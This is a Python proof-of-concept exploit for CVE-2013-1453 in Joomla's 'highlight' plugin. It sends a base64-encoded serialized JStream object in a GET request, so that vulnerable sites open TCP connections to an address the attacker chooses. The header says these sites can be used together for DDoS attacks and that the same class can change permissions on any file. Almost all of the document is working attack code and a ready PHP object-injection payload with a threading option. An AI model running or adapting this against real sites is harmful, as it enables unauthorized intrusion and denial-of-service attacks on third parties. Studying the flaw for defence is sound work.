|
#!/usr/bin/python
#
# Joomla <=2.5.8, <=3.0.2 remote tcp connections opener
#
# Vendor homepage: www.joomla.org ,'
# Versions affected: <=2.5.8, <=3.0.2 ,'
# Created: 2012-12-08 .,. ,'
# Public disclosure: 2013-02-04 .`.`.`. ,' ,'
# CVE: CVE-2013-1453 .`.`.`.`. ,' ,'
# .`.`.`.`.
# Joomla core plugin 'highlight' unserializes .`.`.`.`. ,' ,'
# not trusted input. Plugin is enabled by \\`.`.`. ,'
# default in standard joomla installation. /\.,. ,' ,'
# /
# This proof of concept exploit uses JStream :
# joomla class to make target opens remote tcp :
# connections to custom address, therefore /
# multiple vulnerable joomla instances can be "
# used for ddos attacks.
#
# (JStream class can also be used to execute chmod on any file with any mode)
#
# Author: Marcin "redeemer" Probola
#
import threading
import datetime
import base64
import httplib
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-H","--host",dest="host", help="Host with vulnerable joomla instance", default="localhost")
parser.add_option("-C","--connect",dest="connectHost", help="Make connection to (in format HOST:PORT)", default="localhost:80")
parser.add_option("-T","--threads",dest="threads", help="number of threads", default=1)
(options, args) = parser.parse_args()
# vars
host = options.host
connectHost = options.connectHost
threads = int(options.threads)
# prepare serialized content
serializedTemplate = 'O:7:"JStream":14:{s:11:"\0*\0filemode";i:438;s:10:"\0*\0dirmode";i:493;s:12:"\0*\0chunksize";i:8192;s:11:"\0*\0filename";s:%d:"%s";s:14:"\0*\0writeprefix";s:0:"";s:13:"\0*\0readprefix";s:0:"";s:19:"\0*\0processingmethod";s:1:"f";s:10:"\0*\0filters";a:0:{}s:6:"\0*\0_fh";s:1:"1";s:12:"\0*\0_filesize";N;s:11:"\0*\0_context";N;s:18:"\0*\0_contextOptions";a:0:{}s:12:"\0*\0_openmode";s:1:"w";s:10:"\0*\0_errors";a:0:{}}'
ftpConnectUrl = "ftp://u:p@" + connectHost + "/s"
serializedBase64 = base64.b64encode( serializedTemplate % ( ftpConnectUrl.__len__(), ftpConnectUrl) )
# thread class - blow (make http request)
class ThreadClass(threading.Thread):
def run(self):
conn = httplib.HTTPConnection(host)
conn.connect()
conn.request("GET", "/?highlight="+serializedBase64)
print host + " connect(" +str(threads)+") to " + connectHost + "\n"
# run threads
for i in range(threads):
t = ThreadClass()
t.start()
|